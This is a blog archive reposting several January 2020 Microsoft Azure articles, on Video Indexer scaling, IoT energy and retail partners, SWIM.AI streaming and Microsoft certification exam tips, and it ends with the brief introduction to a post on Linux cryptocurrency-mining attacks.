Thursday, 30 January 2020

Six things to consider when using Video Indexer at scale

Your large archive of videos to index is ever-expanding, thus you have been evaluating Microsoft Video Indexer and decided that you want to take your relationship with it to the next level by scaling up.

In general, scaling shouldn’t be difficult, but when you first face such process you might not be sure what is the best way to do it. Questions like “are there any technological constraints I need to take into account?”, “Is there a smart and efficient way of doing it?”, and “can I prevent spending excess money in the process?” can cross your mind. So, here are six best practices of how to use Video Indexer at scale.

1. When uploading videos, prefer URL over sending the file as a byte array


Video Indexer does give you the choice to upload videos from URL or directly by sending the file as a byte array, but remember that the latter comes with some constraints.

First, it has file size limitations. The size of the byte array file is limited to 2 GB compared to the 30 GB upload size limitation while using URL.

Second and more importantly for your scaling, sending files using multi-part means high dependency on your network, service reliability, connectivity, upload speed, and lost packets somewhere in the world wide web, are just some of the issues that can affect your performance and hence your ability to scale.

Microsoft Tutorial and Material, Azure Certifications, Azure Learning, Azure Prep, Azure Online Exam

When you upload videos using URL you just need to give us a path to the location of a media file and we will take care of the rest.

To upload videos using URL via API you can check this short-code sample or you can use AzCopy for a fast and reliable way to get your content to a storage account from which you can submit it to Video Indexer using SAS URL.

Microsoft Tutorial and Material, Azure Certifications, Azure Learning, Azure Prep, Azure Online Exam

2. Increase media reserved units if needed


Usually in the proof of concept stage when you just start using Video Indexer, you don’t need a lot of computing power. Now, when you want to scale up your usage of Video Indexer you have a larger archive of videos you want to index and you want the process to be at a pace that fits your use case. Therefore, you should think about increasing the number of compute resources you use if the current amount of computing power is just not enough.

In Azure Media Services, when talking about computing power and parallelization we talk about media reserved units (RUs), those are the compute units that determine the parameters for your media processing tasks. The number of RUs affects the number of media tasks that can be processed concurrently in each account and their type determines the speed of processing and one video might require more than one RU if its indexing is complex. When your RUs are busy, new tasks will be held in a queue until another resource is available.

We know you want to operate efficiently and you don’t want to have resources that eventually will stay idle part of the time. For that reason, we offer an auto-scale system that spins RUs down when less processing is needed and spin RUs up when you are in your rush hours (up to fully use all of your RUs). You can easily enable this functionality by turning on the autoscale in the account settings or using Update-Paid-Account-Azure-Media-Services API.

Microsoft Tutorial and Material, Azure Certifications, Azure Learning, Azure Prep, Azure Online Exam
Microsoft Tutorial and Material, Azure Certifications, Azure Learning, Azure Prep, Azure Online Exam

To minimize indexing duration and low throughput we recommend you start with 10 RUs of type S3. Later if you scale up to support more content or higher concurrency, and you need more resources to do so, you can contact us using the support system (on paid accounts only) to ask for more RUs allocation.

3. Respect throttling


Video Indexer is built to deal with indexing at scale, and when you want to get the most out of it you should also be aware of the system’s capabilities and design your integration accordingly. You don’t want to send an upload request for a batch of videos just to discover that some of the movies didn’t upload and you are receiving an HTTP 429 response code (too many requests). It can happen due to the fact that you sent more requests than the limit of movies per minute we support. Don’t worry, in the HTTP response, we add a retry-after header. The header we will specify when you should attempt your next retry. Make sure you respect it before trying your next request.

Microsoft Tutorial and Material, Azure Certifications, Azure Learning, Azure Prep, Azure Online Exam

4. Use callback URL


Have you ever called customer service and their response was “I’m now processing your request, it will take a few minutes. You can leave your phone number and we’ll get back to you when it is done”? The cases when you do leave your number and they call you back the second your request was processed are exactly the same concept as using callback URL.

Thus we recommend that instead of polling the status of your request constantly from the second you sent the upload request, you can just add a callback URL, and wait for us to update you. As soon as there is any status change in your upload request, we will send a POST notification to the URL you sent.

You can add a callback URL as one of the parameters of the upload-video API (see below the description from the API). If you are not sure how to do it, you can check the code samples from our GitHub repo. By the way, for callback URL you can also use Azure Functions, a serverless event-driven platform that can be triggered by HTTP and implement a following flow.

Microsoft Tutorial and Material, Azure Certifications, Azure Learning, Azure Prep, Azure Online Exam

5. Use the right indexing parameters for you


Probably the first thing you need to do when using Video Indexer, and specifically when trying to scale, is to think about how to get the most out of it with the right parameters for your needs. Think about your use case, by defining different parameters you can save yourself money and make the indexing process for your videos faster.

We are giving you the option to customize your usage in Video Indexer by choosing those indexing parameters. Don’t set the preset to streaming it if you don’t plan to watch it, don’t index video insights if you only need audio insights, it is that easy.

6. Index in optimal resolution, not highest resolution


Not too long ago, we were in times when HD videos didn't exist. Now, we have videos of varied qualities from HD to 8K. The question is, what video quality do you need for indexing your videos? The higher the quality of the movie you upload means the higher the file size, and this leads to higher computing power and time needed to upload the video.

Our experiences show that, in many cases, indexing performance has almost no difference between HD (720P) videos and 4K videos. Eventually, you’ll get almost the same insights with the same confidence.

For example, for the face detection feature, a higher resolution can help with the scenario where there are many small but contextually important faces. However, this will come with a quadratic increase in runtime and an increased risk of false positives.

Therefore, we recommend you to verify that you get the right results for your use case and to first test it locally. Upload the same video in 720P and in 4K and compare the insights you get. Remember, No need to use a cannon to kill a fly.

Tuesday, 28 January 2020

Fueling intelligent energy with IoT

At Microsoft, building a future that we can all thrive in is at the center of everything we do. On January 16, as part of the announcement that Microsoft will be carbon negative by 2030, we discussed how advances in human prosperity, as measured by GDP growth, are inextricably tied to the use of energy. Microsoft has committed to deploy $1 billion into a new climate innovation fund to accelerate the development of carbon reduction and removal technologies that will help us and the world become carbon negative. The Azure IoT team continues to invest in the platforms and tools that enable solution builders to deliver new energy solutions, customers to empower their workforce, optimize digital operations and build smart, connected, cities, vehicles, and buildings.


Earlier, Microsoft committed $50 Million through Microsoft AI for Earth that provides technology, resources, and expertise into the hands of those working to solve our most complex global environmental challenges. Challenges like helping customers around the world meet their energy and sustainability commitments. Our partnership with Vattenfall illustrates how we will power new Swedish datacenter locations with renewable energy and our partnership with E.ON who manages low-voltage distribution grids is challenging the limits of traditional technology for low-voltage distribution grids through an inhouse IoT platform based on Microsoft Azure IoT Hub.

Over the past few years, our engineers have had the pleasure to connect with and learn from a large ecosystem of energy solution builders and customers that are proactively shifting their consumption priorities. Transmission system operators (TSOs) are focused on transforming grid operations while distribution system operators (DSOs) and utilities are approaching their customers with new solutions, and all participants are requesting better, more accurate, more secure data.

As millions of new electric vehicles are entering our roads, new challenges arise around the transformation of the energy grid that moves us in our daily commutes. At the heart of these transformations are solutions that help energy providers get connected, stay connected, and transform their businesses through devices, insights, and actions.

Late 2019, we announced updates to Azure IoT Central to help solution builders move beyond proof of concept to building business-critical applications they can brand and sell directly or through Microsoft AppSource. Builders can brand, customize, and make their own apps using extensibility via APIs, data connectors to business applications, repeatability, and manageability of their investment through multitenancy and seamless device connectivity. Two IoT Central energy app templates for solar panel and smart meter monitoring already help energy solution builders accelerate development.

Cloud Strategy, Internet of Things, Artificial Intelligence, Azure Study Material, Azure Prep
Azure IoT Central Energy App Templates.

DistribuTECH 2020


DistribuTECH International is the leading annual transmission and distribution event that addresses technologies used to move electricity from the power plant through the transmission and distribution systems to the meter and inside the home. Held January 28 to January 30 in San Antonio, Texas, we invited 8 leading Energy solution builders to join us at DistribuTECH to demonstrate how they have leveraged Azure IoT to deliver amazing innovation. These partners will join Azure IoT Experts who are available to discuss your business scenarios or get more specific on IoT devices, working with IoT data and delivering a secure solution from the edge to the cloud.

Partners fueling intelligent energy


NXP EdgeVerse™ platform: intelligently manage grid load securely at the edge

The shift to vehicle electrification requires a completely different fueling infrastructure than gas-powered vehicles. Drivers of electric vehicles need to trust they can fuel for every occasion—everywhere, anytime and not get stranded. Every electric utility vehicle in a managed fleet, for example, must be authorized to charge without overloading the grid during peak times.

To manage grid load intelligently, edge computing and security becomes vital. NXP and Microsoft have demonstrated “Demand Side Management” of a smart electric vehicle charging grid and infrastructure running on NXP’s EdgeVerse™ using Azure IoT Central. This solution helps reduced development risk and speed time to market. NXP EdgeVerse includes the NXP Layerscape LS1012 processor and i.MX RT 1060 series, integrated in Scalys TrustBox Edge, to provide best-in-class power efficiency and the most secure (portable) level of communication solution that connects to Azure IOT Central. As the fueling model shifts from petroleum to electric, intelligent management of grid load balancing is key.

OMNIO.net: Danish IoT connectivity startup onboarding devices and unifying data

OMNIO.net, a Danish Industrial IoT connectivity startup, is partnering with Microsoft Azure IoT to solve two of the biggest hurdles in Industrial IoT: onboarding of devices and unification of data.

OMNIO.net is helping companies of all sizes who have outfitted their campuses with solar panels. The OMNIO.net solution connected these panels to Azure IoT Hub to gather real-time data that will help optimize energy production and limit downtime. Companies look to OMNIO.net to overcome challenges connecting industrial devices and getting the most from their data. What may have taken months in the past, with the combination of OMNIO.net’s energy expertise and Azure IoT offers device connection for partners in less than 24 hours, so customers can focus on using their data to solve pressing business challenges rather than on IT.

iGen Technologies: a self-powered heating system for your home

iGen Technologies’ i2 is a self-power heating system for residential homes. With its patented technology, i2 sets a new benchmark in home comfort and efficiency, by generating, storing and using its own electricity, keeping the heat on, even during a grid outage. The system delivers resilience, lower operating costs, efficiency gains, and greenhouse gas emission reductions. The fully integrated solution offers a dispatchable resource with fuel switching capability, providing utilities a valuable tool to manage peak load and surplus generation situations. iGEN has partnered with Microsoft Azure IoT Central to develop a smart IoT interface for the i2 heat and power system. The integration of iGEN’s distributed energy resource (DER) technology with Microsoft’s robust IoT app platform offers an ideal solution for utility Demand Response programs.

Cloud Strategy, Internet of Things, Artificial Intelligence, Azure Study Material, Azure Prep
The i2 self-powered heating system. 

Agder Energi, NODES: scaling a sustainable and integrated energy marketplace

Distributed energy resources, digitalization, decarbonization, and new consumer behavior introduce challenges and opportunities for grid system operators to maintain reliable operation of the power system and create customer-centric services. The NODES marketplace relies on Azure to scale its flexible marketplace across 15 projects in 10 different European countries. The focus is on the use of flexibility from the distribution grid, transmission and distribution coordination, and integration with current balancing markets. Agder Energi is now piloting a flexible asset register and data hub with device management and analytics built on IoT Central. Rune Hogga, CEO of Agder Energi Flexibility, told us, "In order to have control of the data and be able to verify flexibility trades, Azure IoT Central provides us with a fast and efficient way to set up a system to collect data from a large number of distributed flexible assets."

L&T Technology Services: reducing carbon consumption and emissions

L&T Technology Services (LTTS) has developed low carbon and EV charging grid solutions for global enterprises, buildings, and smart cities. The LTTS Smart City, Campus & Building solutions enable reducing carbon emissions by up to 40 percent through its iBEMS on Azure solution by connecting an entire building's infrastructure to through single unified interface. In collaboration with Microsoft Real Estate & Facilities, LTTS is building breakthrough EV Charging Solutions providing actionable insights and usage patterns, demand forecasting, design and efficiency anomalies for Facility Managers on EV Charger assets while accurately tracking carbon credit. The LTTS solution also enables Facility Managers to optimize EV Charging Grid based on energy sources (geothermal, solar, electric) and grid constraints such as energy capacity, providing consumer EV charging notifications-based drive range preferences.

Telensa: utilities to support the business case for smart street lighting

Telensa makes wireless smart city applications, helping cities and utilities around the world save energy, work smarter, and deliver more cohesive services for their residents. Telensa is demonstrating how utilities can support the business case for smart street lighting, offering a platform to simply and seamlessly add other smart city applications like traffic monitoring, air quality and EV charging with AI-driven data insights. Telensa’s smart city solutions are increasingly built on Microsoft Azure IoT, leveraging the combination of data, devices, and connectivity, making IoT applications a practical proposition for any city.

Telensa is leading the Urban Data Project, with an initial deployment in Cambridge, UK. This new edge-AI technology is generating valuable insights from streetlight-based imaging, creating a trusted infrastructure for urban data to enable cities to collect, protect, and use their data for the benefit of all residents. The first deployment is in Cambridge, UK. Telensa’s Urban IQ, using Microsoft Power BI for data visualization is an open, low-cost platform to add multiple sensor applications.

Cloud Strategy, Internet of Things, Artificial Intelligence, Azure Study Material, Azure Prep
Telensa’s streetlight based multi-sensor pods, which run on Azure IoT Edge and feature real-time AI and machine learning to extract insights.

eSmart Systems: improving powerline inspections and asset optimization by empowering human experts with Collaborative AI

eSmart Systems helps utilities gain insight into their assets by creating a virtuous cycle of collaboration and training between subject matter experts like Distribution or Transmission Engineers and state of the art deep learning artificial intelligence (AI).

A Microsoft finalist for AI energy partner of the year in 2019, eSmart’s Connected Drone software uses the Azure platform for accurate and self-improving power grid asset discovery and analysis. Grid inspectors continuously review results and correct them to feedback more accurate results to the system. Utilities can optimize visual data to improve their asset registries, reduce maintenance costs and improve reliability.

Kongsberg Digital: Grid Logic digital twin services for electrical grids

Increased electrification and introduction of intermittent, distributed, and renewable energy production challenge today’s grid operations. A lack of sufficient data and insights lead to over-investment, capacity challenges, and power quality issues. With Grid Logic digital twin services running on Azure, grid operators get forecasting and insights into hotspots and scenario simulation. With Azure IoT Hub, Grid Logic will make it possible to build a robust operating system for automation of real-time grid operation, optimization, and automation.

Cloud Strategy, Internet of Things, Artificial Intelligence, Azure Study Material, Azure Prep
Grid Logic capacity heatmap for a part of Norwegian DSO BKK Nett’s grid.

Let’s connect and collaborate to build your energy solutions

Microsoft Azure IoT is empowering businesses and industries to shape the future with IoT. We’re ready to meet and support you wherever you are in your transformation journey. Pairing a strong portfolio of products and partners will help you accelerate building robust IoT solutions, to achieve your goals. If you are attending DistribuTECH 2020, speak with Azure IoT experts, or connect with one of the partners mentioned above. 

Monday, 27 January 2020

MCSE Productivity Certification: How It Impact Pay and Career


The Microsoft Certified Solutions Expert (MCSE) Productivity certification affirms that individual has the skills essential to move organizations to the cloud, improve user productivity and flexibility, decrease data loss, and better data security. The MCSE: Productivity, like all expert-level certifications under Microsoft’s new certification path, enables applicants to choose from a pool of exams to effectively customize their certification to their needs.
To be eligible for the MCSE: Productivity certification, learners must first earn either the MCSA: Office 365 or MCSA: Windows Server 2012 certification as a prerequisite. After obtaining a prerequisite certification, learners must take and pass one of the elective exams

MCSE: Productivity Certifications


Commonly, learners earning an expert-level certification should have three (3) or more years of experience working Microsoft products, especially Office 365 or Windows Server 2012 (or 2016).

Why should you Become MCSE: Productivity Certified?

1. To Strengthen your Skills

Becoming a professional in any field demands you to strengthen specific skills. Because of Microsoft’s conducive learning environment, study resources, and precise exams, you can be sure you will succeed. Your certifications will confirm to the world that you have the skills that businesses and other organizations are looking for.

2. Certification by a Leading Vendor Microsoft

Microsoft is the most renowned as a vendor for IT services and products and in qualifying applicants with practical skills that are important in the market today. The procedure that you go through while earning your certification is a little strange but worth it. The organization’s goal is to assure that you obtain thorough skills and expertise to execute technical tasks and aid businesses in accomplishing their goals.

3. You Become more Competent

Gaining relevant skills betters your performance at work. With the latest skills and experience, you’ll have a greater approach to technical tasks and problem-solving. So, if you want to be competent in executing your work routines, a MCSE certification would promote your performance.

4. You stand out from your Colleagues

Earning MCSE: Productivity certification is an excellent proof of your skill. There’s more need for professionals with these certifications compared to non-certified peers. Once you receive Microsoft certification, you’ll be more suitable to embrace the opportunities that come up day by day.

5. Better Job Opportunities with MCSE Productivity Certification

Exclusive and competitive skills lead to better job opportunities. With this MCSE certification, you’ll have a greater chance of getting a high-paying job with other perks. As a professional with expertise in Microsoft Exchange Server 2016, you’ll be eligible for jobs like Microsoft server administrator, server engineer, exchange engineer, and Exchange Server systems administrator. These are among the most in-demand skills today.

6. Career Growth

When you have the appropriate skills, you become competent and more trustworthy at work. Being a trustworthy professional means a lot to expect in your career in the long-term. There is a high possibility of receiving a promotion and being designated to more responsibilities that are concerning your skills when you have a real qualification. MCSE: Productivity confirms to your employer that you are determined to deliver better results. MCSE: Productivity certification comes with appealing rewards. Professionals with this certification make up to $89,000 on average per year, according to information from Indeed.com.

Tips to help you pass your MCSE: Productivity certification exam

  • If you’ve now made up your mind to go for this certification. Here are tips to help you pass your exam successfully:
  • Obtain and understand the MCSE Productivity exam objectives.
  • Schedule your exam sufficiently in advance to allow you time for preparation.
  • Make a study plan and follow it thoroughly.
  • Get study guides to help you with preparation.
  • Take practice tests.
  • Make sure you get sufficient rest even as you prepare for your exam.
  • Join online discussion groups with like-minded candidates pursuing the same certification.
  • Reach at the exam center at least 30 minutes before the start.
  • Read exam instructions and questions carefully. Attempt all questions.

Summing It Up
The MCSE: Productivity certification confirms your expertise and dedication to continuous learning with several Microsoft technologies, comprising prominent products such as Exchange Server, Skype for Business, and SharePoint. This certification works as proof of your confidence and proficiency in managing significant workplace products. Your MCSE: Productivity certification will bring a broad array of excellent career opportunities as you aim to achieve your professional goals.

Sunday, 26 January 2020

Compute and stream IoT insights with data-driven applications

There is a lot more data in the world than can possibly be captured with even the most robust, cutting-edge technology. Edge computing and the Internet of Things (IoT) are just two examples of technologies increasing the volume of useful data. There is so much data being created that the current telecom infrastructure will struggle to transport it and even the cloud may become strained to store it. Despite the advent of 5G in telecom, and the rapid growth of cloud storage, data growth will continue to outpace the capacities of both infrastructures. One solution is to build stateful, data-driven applications with technology from SWIM.AI.

The Azure platform offers a wealth of services for partners to enhance, extend, and build industry solutions. Here we describe how one Microsoft partner uses Azure to solve a unique problem.

Shared awareness and communications


The increase in volume has other consequences, especially when IoT devices must be aware of each other and communicate shared information. Peer-to-peer (P2P) communications between IoT assets can overwhelm a network and impair performance. Smart grids are an example of how sensors or electric meters are networked across a distribution grid to improve the overall reliability and cost of delivering electricity. Using meters to determine the locality of issues can help improve service to a residence, neighborhood, municipality, sector, or region. The notion of shared awareness extends to vehicle-to-vehicle (V2V) and vehicle-to-infrastructure (V2I) communications. As networked AI spreads to more cars and devices, so do the benefits of knowing the performance or status of other assets. Other use cases include:

◉ Traffic lights that react to the flow of vehicles across a neighborhood.

◉ Process manufacturing equipment that can determine the impact from previous process steps.

◉ Upstream oil/gas equipment performance that reacts to downstream oil/gas sensor validation.

Problem: Excess data means data loss


When dealing with large volumes of data, enterprises often struggle to determine which data to retain, how much to retain, and for how long they must retain it. By default, they may not retain any of it. Or, they may sub-sample data and retain an incomplete data set. That lost data may potentially contain high value insights. For example, consider traffic information that could be used for efficient vehicle routing, commuter safety, insurance analysis, and government infrastructure reviews. The city of Las Vegas maintains over 1,100 traffic light intersections that can generate more than 45TB of data every day. As stated before, IoT data will challenge our ability to transport and store data at these volumes.

Data may also become excessive when it’s aggregated. For example, telecom and network equipment typically create snapshots of data and send it every 15 minutes. By normalizing this data into a summary over time, you lose granularity. This means the nature or pattern of data over time along with any unique, intuitive events would be missed. The same applies to any equipment capturing fixed-time, window summary data. The loss of data is detrimental to networks where devices share data, either for awareness or communication. The problem is also compounded, as only snapshots are captured and aggregated for an entire network of thousands or millions of devices. Real-time is the goal.

Real-time is the goal


Near real-time is the current standard for stateless application architectures, but “near” real-time is not fast enough anymore. Real-time processing or processing within milliseconds is the new standard for V2V or V2I communications and requires a much more performant architecture. Swim does this by leveraging stateful API’s. With stateful connections, it’s possible to have a rapid response between peers in a network. Speed has enormous effects on efficiency and reliability and it’s essential for systems where safety is paramount such as preventing crashes. Autonomous systems will rely on real-time performance for safety purposes.

An intelligent edge data strategy


SWIM.AI delivers a solution for building scalable streaming applications. According to their site Meet Swim:

“Instead of configuring a separate message broker, app server and database, Swim provides for its own persistence, messaging, scheduling, clustering, replication, introspection, and security. Because everything is integrated, Swim seamlessly scales across edge, cloud, and client, for a fraction of the infrastructure and development cost of traditional cloud application architectures.”

The figure below shows an abstract view of how Swim can simplify IoT architectures:

Microsoft Tutorial and Materials, Azure Learning, Azure Guides, Azure Certification

Harvest data in mid-stream


SWIM.AI uses the lightweight Swim platform, only generating a 2MB footprint to compute and stream IoT insights, building what they call “data-driven applications.” These applications sit in the data stream and generate unique, intelligent web agents for each data source it sees. These intelligent web agents then process the raw data as it streams, only publishing state changes from the data stream. This streamed data can be used by other web agents or stored in a data lake, such as Azure.

Swim uses the “needle in a haystack” metaphor to explain this unique advantage. Swim allows you to apply a metal detector while harvesting the grain to find the needle, without having to bail, transport, or store the grain before searching for the needle. The advantage is in continuously processing data, where intelligent web agents can learn over time or be influenced by domain experts that set thresholds.

Because of the stateful architecture of Swim, only the minimum data necessary is transmitted over the network. Furthermore, application services need not wait for the cloud to establish application context. This results in extremely low latencies, as the stateful connections don’t incur the latency cost of reading and writing to a database or updating based on poll requests.

On SWIM.AI’s website, a Smart City application shows the real-time status of lights and traffic across a hundred intersections with thousands of sensors. The client using the app could be a connected or an autonomous car approaching the intersection. It could be a handheld device next to the intersection, or a browser a thousand miles away in the contiguous US. The latency to real-time is 75-150ms, less than the blink of an eye across the internet.

Benefits

◉ The immediate benefit is saving costs for transporting and storing data.

◉ Through Swim’s technology, you can retain the granularity. For example, take the case of 10 seconds of TB per day generated from every 1000 traffic light intersections. Winnow that data down to 100 seconds of GB per day. But the harvested dataset fully describes the original raw dataset.

◉ Create efficient networked apps for various data sources. For example, achieve peer-to-peer awareness and communications between assets such as vehicles, devices, sensors, and other data sources across the internet.

◉ Achieve ultra-low latencies in the 75-150 millisecond range. This is the key to creating apps that depend on data for awareness and communications.

Azure services used in the solution


The demonstration of DataFabric from SWIM.AI relies on core Azure services for security, provisioning, management, and storage. DataFabric also uses the Common Data Model to simplify sharing information with other systems, such as Power BI or PowerApps, in Azure. Azure technology enables the customer’s analytics to be integrated with events and native ML and cognitive services.

DataFabric is based on the Microsoft IoT reference architecture and uses the following core components:

◉ IoT Hub: Provides a central point in the cloud to manage devices and their data.

◉ IoT Edge Field gateway: An on-premises solution for delivering cloud intelligence.

◉ Azure Event Hubs: Ingests millions of events per second.

◉ Azure Blob: Efficient storage that includes options for hot, warm and archived data.

◉ Azure Data Lake storage: A highly scalable and cost-effective data lake solution for big data analytics.

◉ Azure Streaming Analytics: For transforming data into actionable insights and predictions in near real-time.

Saturday, 25 January 2020

Retailers embrace Azure IoT Central

For many retailers around the world, the busiest quarter of the year just finished with holiday shopping through Black Friday and Cyber Monday to Boxing Day. From supply chain optimization, to digital distribution, and in-store analytics, the retail industry has wholeheartedly embraced IoT technology to support those spikes in demand; particularly in scenarios where brands need to build flexibility, hire strong talent, and optimize the customer experience in order to build brand loyalty. In our latest IoT Signals for Retail research, commissioned by Microsoft and released January 2020, we explore the top insights from leaders who are using IoT today. We discuss growth areas such as improving the customer experience, the use of artificial intelligence to achieve break-through success, and nuances between global markets around security concerns and compliance.

Building retail IoT solutions with Azure IoT Central


As Microsoft and its global partners continue to turn retail insights into solutions that empower retailers around the world, a key question continues to face decision makers about IoT investments; whether to build a solution from scratch, or buy a solution that fits their needs. For many solution builders, Azure IoT Central is the perfect fit, a fully managed IoT platform with predictable pricing and unique features like retail specific application templates that can accelerate solution development thanks to the inclusion of over 30 underlying Azure services. Let us manage the services so you can focus on what’s more important, applying your deep industry knowledge to help your customers.

New tools to accelerate building a retail IoT Solution

.
Today we are excited to announce the addition of our sixth IoT Central retail application template for solution builders. The Micro-fulfilment center template showcases how connectivity and automation can reduce cost by eliminating downtime, increasing security, and improving efficiency. App templates can help solution builders get started quickly and includes sample operator dashboards, sample device templates, simulated devices producing real-time data, access to Plug and Play devices, and security features that give you peace of mind. Fulfillment optimization is a cornerstone of operations for many retailers and optimizing early may offer significant returns in the future. Application templates are helping solution builders overcome challenges like getting past the proof-of-concept phase, or building rapid business cases for new IoT scenarios.

IoT Central Retail Application Templates for solution builders.

Azure IoT Central, Azure Tutorial and Material, Azure Study Materials, Azure Learning, Azure Online Exam, Azure Prep

Innovative Retailers share their IoT stories


In addition to rich industry insights like those found in IoT Signals for Retail, we are proudly releasing three case stories detailing decisions, trade-offs, processes, and results from top global brands investing in IoT solutions, and the retail solution builders supporting them. Read more about how these companies are implementing and winning with their IoT investments and uncover details that might offer you an edge as you navigate your own investments and opportunities.

South Africa Breweries and CIRT team up to solve a cooler tracking conundrum

South Africa Breweries, a subsidiary of AB InBev, is the worlds’ largest brewing company and is committed to keeping its product fresh and cold for customers, a challenge that most consumers take for granted. From tracking missing coolers to reducing costs, and achieving sustainability goals, Sameer Jooma, Director of Innovation and Analytics for AB InBev turned to IoT innovation led by Consumption Information Real Time (CIRT), a South African solution builder. CIRT was tasked to pilot Fridgeloc Connected Cooler, a cooler monitoring system, providing real time insight into temperature (both internal cooler and condenser), connected state and location of hundreds of coolers through urban and rural South Africa. Revamping an existing cooler audit process that involved auditors visiting dealer locations to verify that a cooler was in the right place, and tracking the time between delivery and installation to an outlet are just two of the process optimization benefits found by Jooma.

“The management team wanted to have a view of the coolers, and to be able to manage them centerally at a national level. IoT Central enabled us to gain that live view.” - Sameer Jooma, Director: Innovation and Analytics, AB InBev.

Azure IoT Central, Azure Tutorial and Material, Azure Study Materials, Azure Learning, Azure Online Exam, Azure Prep

On the “road” to a connected cooler in rural South Africa, a field technician gets stuck in the sand on his way to the tavern.

Azure IoT Central, Azure Tutorial and Material, Azure Study Materials, Azure Learning, Azure Online Exam, Azure Prep

Fridgeloc Connected Cooler at a tavern in Soweto, South Africa.

Mars Incorporated Halloween display campaign unveils new insights thanks to Footmarks Inc.


For most consumer packaged goods companies, sales spike during holiday times thanks to investments across the marketing and sales mix, from online display advertising to in-store physical displays. This past Halloween, Jason Wood, Global Display Development Head, Mars Inc., a global manufacturer of confectionery and other food products, decided it was time to gain deeper insights into an age-old problem of tracking where their product displays went after they left the warehouse. Previously, Mars was only able to track the number of displays it produced, and how many left its warehouses for retailer destinations. They found the right partner with Footmarks Inc. who has designed their beacon and gateway-based display tracking solution with Azure IoT Central to deliver secure, simple and scalable insights into what happens once displays begin transit. Several interesting insights emerged throughout the campaign and afterward.

"Information on when displays came off the floor were surprising—major insights that we wouldn't have been able to get to without the solution." - Jason Wood, Global Display Development Head, Mars Inc.

Azure IoT Central, Azure Tutorial and Material, Azure Study Materials, Azure Learning, Azure Online Exam, Azure Prep
Foormarks Inc., Smart Connect Cloud dashboard for Mars Wrigley showing display tracking solution using IoT sensors for the 2019 Halloween campaign.

Microsoft turns to C.H. Robinson and Intel for Xbox and Surface supply chain visibility


In advance of the busy 2019 holiday season and the introduction of many new Surface SKU’s, the Microsoft supply chain team was interested in testing the benefits of a single platform connecting IoT devices on shipments globally, streamlining analytics and device management. This Microsoft team was also thinking ahead, preparing for the launch of the latest Xbox console, Xbox Series X, and for a series of new Surface product launches. With Surface and Xbox demand projected to grow around the world, the need for insights and appropriate actions along the supply chain was only going to increase. The Microsoft team partnered with TMC (a division of C.H. Robinson), a global technology and logistics management provider who partnered with Intel, to design a transformative solution based on their existing Navisphere Vision software that could be deployed globally using Azure IoT Central. The goal was to track and monitor shipments’ ambient condition for shock, light, and temperature to identify any damage in real time, anywhere in the world—at a scale covering millions of products.

“The real power comes in the combination of C.H. Robinson’s Navisphere Vision, technology that is built by and for supply chain experts, and the speed, security, and connectivity of Azure IOT Central.” - Chris Cutshaw, Director of Commercial and Product Strategy at TMC

Azure IoT Central, Azure Tutorial and Material, Azure Study Materials, Azure Learning, Azure Online Exam, Azure Prep
Navisphere Vision dashboard showing IoT Sensors activity, managed through Azure IoT Central.

Thursday, 23 January 2020

Microsoft 70-487 Exam Is Your Way to Obtain MCSD App Builder Certification

Hiring managers are always looking for skilled employees. For recruiting them, different organizations shave different policies. The hiring process is something that makes the world's top brands stand above from the rest because they don't undermine the quality of professional they hire. To guarantee their loyalty, they offer them high salaries.

Microsoft is one such tech company that measures the skills of employees by providing specialized exams and training. Microsoft 70-487 is one of the most challenging exams in the tech field. Through this blog, we are trying to mention tips on how you can pass the exam and obtain your certification. But before this, it is necessary to get an overview of the exam to understand it better.

Microsoft 70-487 Exam Details

Microsoft 70-487 exam is known as Developing Microsoft Azureand Web Services. This exam includes covers five comprehensive topics. Each topic has its percentage in the exam.

Microsoft 70-487 Exam Syllabus Topics:

  • Accessing Data (20-25%)
  • Querying and Manipulating Data by Using the Entity Framework (20-25%)
  • Creating and Consuming Web API-based services (20-25%)
  • Designing and Implementing Web Services (15-20%)
  • Deploying Web Applications and Services (15-20%)

The percentages help you manage the time efficiently and see which topics require more time for preparation.

The Microsoft 70-487 exam costs $165, and you can register for this exam by visiting the Microsoft registration portal. It is also essential to note that this exam is available in many languages such as English, Simplified Chinese, French, German, Portuguese, and Japanese. This provides the options to pick a language that they understand best for the best result.

One special feature of this exam is that it does not give numerical scores but rather a simple pass or fail status though it provides score bars for each topic explaining areas where the applicant is weak or strong.

Prerequisites for Microsoft 70-487 Exam


To be eligible for this exam, you must hold the Developing Microsoft Azure and Web Services Web Applications certification. It indicates that you've passed 70-480 or 70-483 and 70-486 exams. You will also be expected to have at least three years' experience developing ASP.NET MVC-based solutions. Besides, you need to be an expert in developing Web applications and familiar with HTTP services. This indicates that this intermediate certification is perfect for IT professionals who are highly skilled in developing and deploying server solutions in multi-layered environments such as cloud-based Windows Azure.

Available Exam Preparation Resources

When preparing for the Microsoft exam, it is vital to use quality resources, which are likely to improve your odds of passing. Since most of these resources come with a price, it is wise to go for learning materials that give you accurate information at an affordable price. This way, you will manage your funds well and get value for money.
Here are some of the helpful resources from Microsoft you can use:

First, let us determine the target audience for this certification exam. The Microsoft 70-487 exam is aimed at those individuals who are expert in ASP.NET MVC. They also have a thorough understanding of Visual Studio 2017 and .NET Core. In addition to this, the applicants should have at least three to five years of experience working in web development. Having determined the audience for the exam, let us look at a few tips that will helpyou pass your exam at your first attempt.

Understand the Question and exam content

This is very important to your success in the exam. You should not wait until the exam date before you understand the content of the exam. There are various materials and guides for Microsoft 70-487. Studying from these materials will keep you updated with what to expect in the actual exam. Usually, the exam structure has a different question format, such as drag and drop, case studies, multiple-choice questions, and active screen. The case studies are based upon requirements and projects that are intended to assess your analytical ability and skills. You might also come across questions in debugging code and adding code. Concerning question contents, you must have some knowledge of WCF. You also need to become familiar with Visual Studio tools, along with a deployment (including IIS). Take time to understand web development strategies, HTTP, and FTP.

Use Various Study Materials

There are various study materials you can find online. You can start with MVA (Microsoft Virtual Academy). The platform gives a broad range of videos and tutorial materials for this exam, and the best thing about it is that it is free. You can also explore other websites to perform online practice tests.

The Microsoft 70-487 exam is an outstanding choice for professional developers with some level of experience in web development. As stated earlier, the exam is not easy. Therefore, you need to study hard to be able to pass at first attempt.

Learning from cryptocurrency mining attack scripts on Linux

Cryptocurrency mining attacks continue to represent a threat to many of our Azure Linux customers. In the past, we've talked about how some attackers use brute force techniques to guess account names and passwords and use those to gain access to machines. Today, we're talking about an attack that a few of our customers have seen where a service is exploited to run the attackers code directly on the machine hosting the service.

Azure Study Materials, Azure Guides, Azure Certifications, Azure Online Exam, Azure Tutorial and Material

